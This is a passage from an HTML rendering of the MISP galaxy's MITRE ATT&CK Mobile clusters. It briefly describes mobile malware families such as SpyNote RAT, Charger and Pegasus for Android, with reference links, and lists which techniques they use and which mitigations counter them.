<p>As described by Palo Alto Networks (Citation: ZergHelper), the (Citation: ZergHelper) app uses techniques to evade Apple&#8217;s App Store review process for itself and uses techniques to install additional applications that are not in Apple&#8217;s App Store.</p>
</div>
<div class="paragraph">
<p>Aliases: (Citation: ZergHelper)</p>
</div>
<div class="paragraph">
<p>ZergHelper - MOB-S0003 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ZergHelper</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1447. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0003">https://attack.mitre.org/mobile/index.php/Software/MOB-S0003</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/">http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spynote_rat_mob_s0021"><a class="anchor" href="#_spynote_rat_mob_s0021"></a><a class="link" href="#_spynote_rat_mob_s0021">SpyNote RAT - MOB-S0021</a></h3>
<div class="paragraph">
<p>SpyNote RAT (Citation: Zscaler-SpyNote) (Remote Access Trojan) is a family of malicious Android apps. The "SpyNote RAT builder" tool can be used to develop malicious apps with the SpyNote RAT functionality.</p>
</div>
<div class="paragraph">
<p>Aliases: SpyNote RAT</p>
</div>
<div class="paragraph">
<p>SpyNote RAT - MOB-S0021 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SpyNote RAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1448. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0021">https://attack.mitre.org/mobile/index.php/Software/MOB-S0021</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app">https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rcsandroid_mob_s0011"><a class="anchor" href="#_rcsandroid_mob_s0011"></a><a class="link" href="#_rcsandroid_mob_s0011">RCSAndroid - MOB-S0011</a></h3>
<div class="literalblock">
<div class="content">
<pre>(Citation: RCSAndroid) (Citation: RCSAndroid) is Android malware allegedly distributed by Hacking Team.</pre>
</div>
</div>
<div class="paragraph">
<p>Aliases: (Citation: RCSAndroid)</p>
</div>
<div class="paragraph">
<p>RCSAndroid - MOB-S0011 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RCSAndroid</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1449. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0011">https://attack.mitre.org/mobile/index.php/Software/MOB-S0011</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/hackedteam/core-android/tree/master/RCSAndroid">https://github.com/hackedteam/core-android/tree/master/RCSAndroid</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_charger_mob_s0039"><a class="anchor" href="#_charger_mob_s0039"></a><a class="link" href="#_charger_mob_s0039">Charger - MOB-S0039</a></h3>
<div class="paragraph">
<p>The Charger Android malware steals "steals contacts and SMS messages from the user&#8217;s device". It also "asks for admin permissions" and "[i]f granted, the ransomware locks the device and displays a message demanding payment". (Citation: CheckPoint-Charger)</p>
</div>
<div class="paragraph">
<p>Aliases: Charger</p>
</div>
<div class="paragraph">
<p>Charger - MOB-S0039 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Charger</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1450. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0039">https://attack.mitre.org/mobile/index.php/Software/MOB-S0039</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.checkpoint.com/2017/01/24/charger-malware/">http://blog.checkpoint.com/2017/01/24/charger-malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_yispecter_mob_s0027"><a class="anchor" href="#_yispecter_mob_s0027"></a><a class="link" href="#_yispecter_mob_s0027">YiSpecter - MOB-S0027</a></h3>
<div class="paragraph">
<p>iOS malware that "is different from previous seen iOS malware in that it attacks both jailbroken and non-jailbroken iOS devices" and "abuses private APIs in the iOS system to implement malicious functionalities" (Citation: PaloAlto-YiSpecter).</p>
</div>
<div class="paragraph">
<p>Aliases: YiSpecter</p>
</div>
<div class="paragraph">
<p>YiSpecter - MOB-S0027 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>YiSpecter</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1451. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0027">https://attack.mitre.org/mobile/index.php/Software/MOB-S0027</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032"><a class="anchor" href="#_pegasus_for_android_mob_s0032"></a><a class="link" href="#_pegasus_for_android_mob_s0032">Pegasus for Android - MOB-S0032</a></h3>
<div class="paragraph">
<p>Discovered and analyzed by Lookout (Citation: Lookout-PegasusAndroid) and Google (Citation: Google-Chrysaor), Pegasus for Android (also known as Chrysaor) is spyware that was used in targeted attacks. Pegasus for Android does not use zero day vulnerabilities. It attempts to escalate privileges using well-known vulnerabilities, and even if the attempts fail, it still performs some subset of spyware functions that do not require escalated privileges.</p>
</div>
<div class="paragraph">
<p>Aliases: Pegasus for Android, Chrysaor</p>
</div>
<div class="paragraph">
<p>Pegasus for Android - MOB-S0032 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Pegasus for Android</p>
</li>
<li>
<p>Chrysaor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1452. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0032">https://attack.mitre.org/mobile/index.php/Software/MOB-S0032</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/blog/2017/04/03/pegasus-android/">https://blog.lookout.com/blog/2017/04/03/pegasus-android/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html">https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xcodeghost_mob_s0013"><a class="anchor" href="#_xcodeghost_mob_s0013"></a><a class="link" href="#_xcodeghost_mob_s0013">XcodeGhost - MOB-S0013</a></h3>
<div class="paragraph">
<p>iOS malware analyzed by Palo Alto Networks (Citation: (Citation: PaloAlto-XcodeGhost)1) (Citation: PaloAlto-XcodeGhost)</p>
</div>
<div class="paragraph">
<p>Aliases: XcodeGhost</p>
</div>
<div class="paragraph">
<p>XcodeGhost - MOB-S0013 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>XcodeGhost</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1453. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0013">https://attack.mitre.org/mobile/index.php/Software/MOB-S0013</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/">http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/">http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_mobile_attack_relationship"><a class="anchor" href="#_mobile_attack_relationship"></a><a class="link" href="#_mobile_attack_relationship">Mobile Attack - Relationship</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>MITRE Relationship.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Mobile Attack - Relationship is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile</a> attack - relationship.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_lockscreen_bypass_mob_t1064"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_lockscreen_bypass_mob_t1064"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_lockscreen_bypass_mob_t1064">Security Updates (MOB-M1001) mitigates Lockscreen Bypass (MOB-T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_charger_mob_s0039_uses_lock_user_out_of_device_mob_t1049"><a class="anchor" href="#_charger_mob_s0039_uses_lock_user_out_of_device_mob_t1049"></a><a class="link" href="#_charger_mob_s0039_uses_lock_user_out_of_device_mob_t1049">Charger (MOB-S0039) uses Lock User Out of Device (MOB-T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_exploit_baseband_vulnerability_mob_t1058"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_exploit_baseband_vulnerability_mob_t1058"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_exploit_baseband_vulnerability_mob_t1058">Use Recent OS Version (MOB-M1006) mitigates Exploit Baseband Vulnerability (MOB-T1058)</a></h3>
</div>
<div class="sect2">
<h3 id="_spynote_rat_mob_s0021_uses_app_auto_start_at_device_boot_mob_t1005"><a class="anchor" href="#_spynote_rat_mob_s0021_uses_app_auto_start_at_device_boot_mob_t1005"></a><a class="link" href="#_spynote_rat_mob_s0021_uses_app_auto_start_at_device_boot_mob_t1005">SpyNote RAT (MOB-S0021) uses App Auto-Start at Device Boot (MOB-T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_adups_mob_s0025_uses_capture_sms_messages_mob_t1015"><a class="anchor" href="#_adups_mob_s0025_uses_capture_sms_messages_mob_t1015"></a><a class="link" href="#_adups_mob_s0025_uses_capture_sms_messages_mob_t1015">Adups (MOB-S0025) uses Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_rcsandroid_mob_s0011_uses_access_sensitive_data_or_credentials_in_files_mob_t1012"><a class="anchor" href="#_rcsandroid_mob_s0011_uses_access_sensitive_data_or_credentials_in_files_mob_t1012"></a><a class="link" href="#_rcsandroid_mob_s0011_uses_access_sensitive_data_or_credentials_in_files_mob_t1012">RCSAndroid (MOB-S0011) uses Access Sensitive Data or Credentials in Files (MOB-T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_rcsandroid_mob_s0011_uses_location_tracking_mob_t1033"><a class="anchor" href="#_rcsandroid_mob_s0011_uses_location_tracking_mob_t1033"></a><a class="link" href="#_rcsandroid_mob_s0011_uses_location_tracking_mob_t1033">RCSAndroid (MOB-S0011) uses Location Tracking (MOB-T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_encrypt_network_traffic_mob_m1009_mitigates_downgrade_to_insecure_protocols_mob_t1069"><a class="anchor" href="#_encrypt_network_traffic_mob_m1009_mitigates_downgrade_to_insecure_protocols_mob_t1069"></a><a class="link" href="#_encrypt_network_traffic_mob_m1009_mitigates_downgrade_to_insecure_protocols_mob_t1069">Encrypt Network Traffic (MOB-M1009) mitigates Downgrade to Insecure Protocols (MOB-T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_fake_developer_accounts_mob_t1045"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_fake_developer_accounts_mob_t1045"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_fake_developer_accounts_mob_t1045">Application Vetting (MOB-M1005) mitigates Fake Developer Accounts (MOB-T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_droidjack_rat_mob_s0036_uses_access_call_log_mob_t1036"><a class="anchor" href="#_droidjack_rat_mob_s0036_uses_access_call_log_mob_t1036"></a><a class="link" href="#_droidjack_rat_mob_s0036_uses_access_call_log_mob_t1036">DroidJack RAT (MOB-S0036) uses Access Call Log (MOB-T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_access_sensitive_data_in_device_logs_mob_t1016"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_access_sensitive_data_in_device_logs_mob_t1016"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_access_sensitive_data_in_device_logs_mob_t1016">Application Vetting (MOB-M1005) mitigates Access Sensitive Data in Device Logs (MOB-T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_modify_cached_executable_code_mob_t1006"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_modify_cached_executable_code_mob_t1006"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_modify_cached_executable_code_mob_t1006">Use Recent OS Version (MOB-M1006) mitigates Modify cached executable code (MOB-T1006)</a></h3>
</div>
<div class="sect2">
<h3 id="_hummingbad_mob_s0038_uses_manipulate_app_store_rankings_or_ratings_mob_t1055"><a class="anchor" href="#_hummingbad_mob_s0038_uses_manipulate_app_store_rankings_or_ratings_mob_t1055"></a><a class="link" href="#_hummingbad_mob_s0038_uses_manipulate_app_store_rankings_or_ratings_mob_t1055">HummingBad (MOB-S0038) uses Manipulate App Store Rankings or Ratings (MOB-T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_local_network_connections_discovery_mob_t1024"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_local_network_connections_discovery_mob_t1024"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_local_network_connections_discovery_mob_t1024">Application Vetting (MOB-M1005) mitigates Local Network Connections Discovery (MOB-T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_device_provided_credential_storage_mob_m1008_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012"><a class="anchor" href="#_use_device_provided_credential_storage_mob_m1008_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012"></a><a class="link" href="#_use_device_provided_credential_storage_mob_m1008_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012">Use Device-Provided Credential Storage (MOB-M1008) mitigates Access Sensitive Data or Credentials in Files (MOB-T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_interconnection_filtering_mob_m1014_mitigates_exploit_ss7_to_track_device_location_mob_t1053"><a class="anchor" href="#_interconnection_filtering_mob_m1014_mitigates_exploit_ss7_to_track_device_location_mob_t1053"></a><a class="link" href="#_interconnection_filtering_mob_m1014_mitigates_exploit_ss7_to_track_device_location_mob_t1053">Interconnection Filtering (MOB-M1014) mitigates Exploit SS7 to Track Device Location (MOB-T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_access_call_log_mob_t1036"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_access_call_log_mob_t1036"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_access_call_log_mob_t1036">Application Vetting (MOB-M1005) mitigates Access Call Log (MOB-T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_app_delivered_via_web_download_mob_t1034"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_app_delivered_via_web_download_mob_t1034"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_app_delivered_via_web_download_mob_t1034">User Guidance (MOB-M1011) mitigates App Delivered via Web Download (MOB-T1034)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_microphone_or_camera_recordings_mob_t1032"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_microphone_or_camera_recordings_mob_t1032"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_microphone_or_camera_recordings_mob_t1032">Application Vetting (MOB-M1005) mitigates Microphone or Camera Recordings (MOB-T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_hummingbad_mob_s0038_uses_generate_fraudulent_advertising_revenue_mob_t1075"><a class="anchor" href="#_hummingbad_mob_s0038_uses_generate_fraudulent_advertising_revenue_mob_t1075"></a><a class="link" href="#_hummingbad_mob_s0038_uses_generate_fraudulent_advertising_revenue_mob_t1075">HummingBad (MOB-S0038) uses Generate Fraudulent Advertising Revenue (MOB-T1075)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_developer_guidance_mob_m1013_mitigates_access_sensitive_data_in_device_logs_mob_t1016"><a class="anchor" href="#_application_developer_guidance_mob_m1013_mitigates_access_sensitive_data_in_device_logs_mob_t1016"></a><a class="link" href="#_application_developer_guidance_mob_m1013_mitigates_access_sensitive_data_in_device_logs_mob_t1016">Application Developer Guidance (MOB-M1013) mitigates Access Sensitive Data in Device Logs (MOB-T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_zerghelper_mob_s0003_uses_download_new_code_at_runtime_mob_t1010"><a class="anchor" href="#_zerghelper_mob_s0003_uses_download_new_code_at_runtime_mob_t1010"></a><a class="link" href="#_zerghelper_mob_s0003_uses_download_new_code_at_runtime_mob_t1010">ZergHelper (MOB-S0003) uses Download New Code at Runtime (MOB-T1010)</a></h3>
</div>
<div class="sect2">
<h3 id="_xcodeghost_mob_s0013_uses_malicious_software_development_tools_mob_t1065"><a class="anchor" href="#_xcodeghost_mob_s0013_uses_malicious_software_development_tools_mob_t1065"></a><a class="link" href="#_xcodeghost_mob_s0013_uses_malicious_software_development_tools_mob_t1065">XcodeGhost (MOB-S0013) uses Malicious Software Development Tools (MOB-T1065)</a></h3>
</div>
<div class="sect2">
<h3 id="_androrat_mob_s0008_uses_access_call_log_mob_t1036"><a class="anchor" href="#_androrat_mob_s0008_uses_access_call_log_mob_t1036"></a><a class="link" href="#_androrat_mob_s0008_uses_access_call_log_mob_t1036">AndroRAT (MOB-S0008) uses Access Call Log (MOB-T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_rumms_mob_s0029_uses_system_information_discovery_mob_t1029"><a class="anchor" href="#_rumms_mob_s0029_uses_system_information_discovery_mob_t1029"></a><a class="link" href="#_rumms_mob_s0029_uses_system_information_discovery_mob_t1029">RuMMS (MOB-S0029) uses System Information Discovery (MOB-T1029)</a></h3>
</div>
<div class="sect2">
<h3 id="_encrypt_network_traffic_mob_m1009_mitigates_manipulate_device_communication_mob_t1066"><a class="anchor" href="#_encrypt_network_traffic_mob_m1009_mitigates_manipulate_device_communication_mob_t1066"></a><a class="link" href="#_encrypt_network_traffic_mob_m1009_mitigates_manipulate_device_communication_mob_t1066">Encrypt Network Traffic (MOB-M1009) mitigates Manipulate Device Communication (MOB-T1066)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_app_auto_start_at_device_boot_mob_t1005"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_app_auto_start_at_device_boot_mob_t1005"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_app_auto_start_at_device_boot_mob_t1005">Application Vetting (MOB-M1005) mitigates App Auto-Start at Device Boot (MOB-T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_modify_os_kernel_or_boot_partition_mob_t1001"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_modify_os_kernel_or_boot_partition_mob_t1001"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_modify_os_kernel_or_boot_partition_mob_t1001">Security Updates (MOB-M1001) mitigates Modify OS Kernel or Boot Partition (MOB-T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_modify_trusted_execution_environment_mob_t1002"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_modify_trusted_execution_environment_mob_t1002"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_modify_trusted_execution_environment_mob_t1002">Security Updates (MOB-M1001) mitigates Modify Trusted Execution Environment (MOB-T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_shedun_mob_s0010_uses_repackaged_application_mob_t1047"><a class="anchor" href="#_shedun_mob_s0010_uses_repackaged_application_mob_t1047"></a><a class="link" href="#_shedun_mob_s0010_uses_repackaged_application_mob_t1047">Shedun (MOB-S0010) uses Repackaged Application (MOB-T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_x_agent_mob_s0030_uses_location_tracking_mob_t1033"><a class="anchor" href="#_x_agent_mob_s0030_uses_location_tracking_mob_t1033"></a><a class="link" href="#_x_agent_mob_s0030_uses_location_tracking_mob_t1033">X-Agent (MOB-S0030) uses Location Tracking (MOB-T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_enterprise_policy_mob_m1012_mitigates_rogue_wi_fi_access_points_mob_t1068"><a class="anchor" href="#_enterprise_policy_mob_m1012_mitigates_rogue_wi_fi_access_points_mob_t1068"></a><a class="link" href="#_enterprise_policy_mob_m1012_mitigates_rogue_wi_fi_access_points_mob_t1068">Enterprise Policy (MOB-M1012) mitigates Rogue Wi-Fi Access Points (MOB-T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_androrat_mob_s0008_uses_microphone_or_camera_recordings_mob_t1032"><a class="anchor" href="#_androrat_mob_s0008_uses_microphone_or_camera_recordings_mob_t1032"></a><a class="link" href="#_androrat_mob_s0008_uses_microphone_or_camera_recordings_mob_t1032">AndroRAT (MOB-S0008) uses Microphone or Camera Recordings (MOB-T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_rumms_mob_s0029_uses_standard_application_layer_protocol_mob_t1040"><a class="anchor" href="#_rumms_mob_s0029_uses_standard_application_layer_protocol_mob_t1040"></a><a class="link" href="#_rumms_mob_s0029_uses_standard_application_layer_protocol_mob_t1040">RuMMS (MOB-S0029) uses Standard Application Layer Protocol (MOB-T1040)</a></h3>
</div>
<div class="sect2">
<h3 id="_adups_mob_s0025_uses_malicious_or_vulnerable_built_in_device_functionality_mob_t1076"><a class="anchor" href="#_adups_mob_s0025_uses_malicious_or_vulnerable_built_in_device_functionality_mob_t1076"></a><a class="link" href="#_adups_mob_s0025_uses_malicious_or_vulnerable_built_in_device_functionality_mob_t1076">Adups (MOB-S0025) uses Malicious or Vulnerable Built-in Device Functionality (MOB-T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_capture_clipboard_data_mob_t1017"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_capture_clipboard_data_mob_t1017"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_capture_clipboard_data_mob_t1017">Application Vetting (MOB-M1005) mitigates Capture Clipboard Data (MOB-T1017)</a></h3>
</div>
<div class="sect2">
<h3 id="_xcodeghost_mob_s0013_uses_capture_clipboard_data_mob_t1017"><a class="anchor" href="#_xcodeghost_mob_s0013_uses_capture_clipboard_data_mob_t1017"></a><a class="link" href="#_xcodeghost_mob_s0013_uses_capture_clipboard_data_mob_t1017">XcodeGhost (MOB-S0013) uses Capture Clipboard Data (MOB-T1017)</a></h3>
</div>
<div class="sect2">
<h3 id="_android_chuli_a_mob_s0020_uses_location_tracking_mob_t1033"><a class="anchor" href="#_android_chuli_a_mob_s0020_uses_location_tracking_mob_t1033"></a><a class="link" href="#_android_chuli_a_mob_s0020_uses_location_tracking_mob_t1033">Android/Chuli.A (MOB-S0020) uses Location Tracking (MOB-T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_charger_mob_s0039_uses_location_tracking_mob_t1033"><a class="anchor" href="#_charger_mob_s0039_uses_location_tracking_mob_t1033"></a><a class="link" href="#_charger_mob_s0039_uses_location_tracking_mob_t1033">Charger (MOB-S0039) uses Location Tracking (MOB-T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_rcsandroid_mob_s0011_uses_alternate_network_mediums_mob_t1041"><a class="anchor" href="#_rcsandroid_mob_s0011_uses_alternate_network_mediums_mob_t1041"></a><a class="link" href="#_rcsandroid_mob_s0011_uses_alternate_network_mediums_mob_t1041">RCSAndroid (MOB-S0011) uses Alternate Network Mediums (MOB-T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_system_information_discovery_mob_t1029"><a class="anchor" href="#_pegasus_mob_s0005_uses_system_information_discovery_mob_t1029"></a><a class="link" href="#_pegasus_mob_s0005_uses_system_information_discovery_mob_t1029">Pegasus (MOB-S0005) uses System Information Discovery (MOB-T1029)</a></h3>
</div>
<div class="sect2">
<h3 id="_rcsandroid_mob_s0011_uses_capture_sms_messages_mob_t1015"><a class="anchor" href="#_rcsandroid_mob_s0011_uses_capture_sms_messages_mob_t1015"></a><a class="link" href="#_rcsandroid_mob_s0011_uses_capture_sms_messages_mob_t1015">RCSAndroid (MOB-S0011) uses Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_remotely_wipe_data_without_authorization_mob_t1072"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_remotely_wipe_data_without_authorization_mob_t1072"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_remotely_wipe_data_without_authorization_mob_t1072">User Guidance (MOB-M1011) mitigates Remotely Wipe Data Without Authorization (MOB-T1072)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_capture_sms_messages_mob_t1015"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_capture_sms_messages_mob_t1015"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_capture_sms_messages_mob_t1015">Application Vetting (MOB-M1005) mitigates Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_enterprise_policy_mob_m1012_mitigates_exploit_via_charging_station_or_pc_mob_t1061"><a class="anchor" href="#_enterprise_policy_mob_m1012_mitigates_exploit_via_charging_station_or_pc_mob_t1061"></a><a class="link" href="#_enterprise_policy_mob_m1012_mitigates_exploit_via_charging_station_or_pc_mob_t1061">Enterprise Policy (MOB-M1012) mitigates Exploit via Charging Station or PC (MOB-T1061)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_exploit_tee_vulnerability_mob_t1008"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_exploit_tee_vulnerability_mob_t1008"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_exploit_tee_vulnerability_mob_t1008">Security Updates (MOB-M1001) mitigates Exploit TEE Vulnerability (MOB-T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_android_chuli_a_mob_s0020_uses_device_type_discovery_mob_t1022"><a class="anchor" href="#_android_chuli_a_mob_s0020_uses_device_type_discovery_mob_t1022"></a><a class="link" href="#_android_chuli_a_mob_s0020_uses_device_type_discovery_mob_t1022">Android/Chuli.A (MOB-S0020) uses Device Type Discovery (MOB-T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_remotely_track_device_without_authorization_mob_t1071"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_remotely_track_device_without_authorization_mob_t1071"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_remotely_track_device_without_authorization_mob_t1071">User Guidance (MOB-M1011) mitigates Remotely Track Device Without Authorization (MOB-T1071)</a></h3>
</div>
<div class="sect2">
